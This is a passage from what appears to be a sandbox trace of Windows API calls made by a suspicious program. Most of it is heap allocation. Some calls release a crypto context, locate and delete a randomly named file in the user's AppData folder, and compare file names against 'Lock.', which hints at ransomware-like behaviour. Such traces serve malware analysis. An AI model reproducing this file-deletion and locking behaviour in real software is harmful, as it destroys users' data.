(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0226.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0226.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0226.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0226.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0226.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0226.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0226.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0226.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0226.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0226.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0226.846] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0226.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0226.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0226.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0226.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0226.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0226.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0226.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0226.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0226.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0226.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0226.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0226.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0226.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0226.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0226.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0226.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0226.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0226.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0226.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0226.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0226.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0226.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0226.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0226.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0226.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0226.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0226.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0226.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0226.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0226.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0226.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0226.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0226.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0226.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0226.848] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0226.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0226.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0226.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0226.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0226.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0226.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0226.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0226.848] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0226.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0226.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0226.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0226.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0226.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0226.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0226.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0226.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0226.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0226.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0226.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0226.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0226.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0226.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0226.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0226.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0226.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0226.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0226.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0226.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0226.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0226.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0226.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0226.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0226.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0226.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0226.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0226.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0226.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0226.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0226.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0226.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0226.850] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0226.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0226.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0226.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0226.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0226.850] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0226.850] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0226.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0226.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0226.851] FreeLibrary (hLibModule=0x756e0000) returned 1 [0226.851] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.851] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.851] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0226.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0226.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0226.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0226.851] CloseHandle (hObject=0x2a0) returned 1 [0226.900] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0226.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0226.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0226.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0226.901] CloseHandle (hObject=0x2d0) returned 1 [0226.904] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0226.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0226.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0226.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0226.905] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0226.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0226.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0226.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0226.906] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0226.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0226.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0226.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0226.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0226.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0226.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0226.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0226.906] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/CTe6ly.avi", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\CTe6ly.avi", lpFilePart=0x8cedf4*="CTe6ly.avi") returned 0x2a [0226.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0226.906] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\CTe6ly.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\cte6ly.avi")) returned 0x20 [0226.907] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\CTe6ly.avi", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fe9afe0, ftCreationTime.dwHighDateTime=0x1d5e841, ftLastAccessTime.dwLowDateTime=0xd1a4d120, ftLastAccessTime.dwHighDateTime=0x1d5e7c9, ftLastWriteTime.dwLowDateTime=0xd1a4d120, ftLastWriteTime.dwHighDateTime=0x1d5e7c9, nFileSizeHigh=0x0, nFileSizeLow=0x4f91, dwReserved0=0x1, dwReserved1=0x1c, cFileName="CTe6ly.avi", cAlternateFileName="")) returned 0xa87350 [0226.907] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\CTe6ly.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\cte6ly.avi")) returned 1 [0226.967] FindNextFileW (in: hFindFile=0xa87350, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fe9afe0, ftCreationTime.dwHighDateTime=0x1d5e841, ftLastAccessTime.dwLowDateTime=0xd1a4d120, ftLastAccessTime.dwHighDateTime=0x1d5e7c9, ftLastWriteTime.dwLowDateTime=0xd1a4d120, ftLastWriteTime.dwHighDateTime=0x1d5e7c9, nFileSizeHigh=0x0, nFileSizeLow=0x4f91, dwReserved0=0x1, dwReserved1=0x1c, cFileName="CTe6ly.avi", cAlternateFileName="")) returned 0 [0226.967] FindClose (in: hFindFile=0xa87350 | out: hFindFile=0xa87350) returned 1 [0226.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0226.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0226.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0226.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0226.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0226.968] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0226.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0226.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0226.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0226.968] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0226.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0226.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0226.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0226.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0226.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0226.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0226.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0226.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0226.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0226.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0226.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0226.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0226.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0226.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0226.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0226.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0226.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0226.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0226.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0226.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x56) returned 0x2e564e0 [0226.969] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/CTe6ly.avi", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\CTe6ly.avi", lpFilePart=0x8cf650*="CTe6ly.avi") returned 0x2a [0226.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0226.969] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\CTe6ly.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\cte6ly.avi")) returned 0xffffffff [0226.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0226.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0226.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0226.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0226.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0226.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0226.970] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0226.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0226.970] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0226.970] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0226.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0226.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0226.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0226.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0226.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0226.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0226.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0226.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0226.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0226.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0226.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0226.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0226.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0226.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dm2KF.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0226.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m2KF.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0226.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2KF.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0226.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KF.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0226.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0226.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0226.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0226.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0226.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0226.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0226.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0226.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0226.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0226.971] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0226.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0226.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0226.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0226.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0226.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0226.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0226.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0226.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0226.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0226.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0226.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0226.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0226.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0226.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0226.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0226.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0226.972] 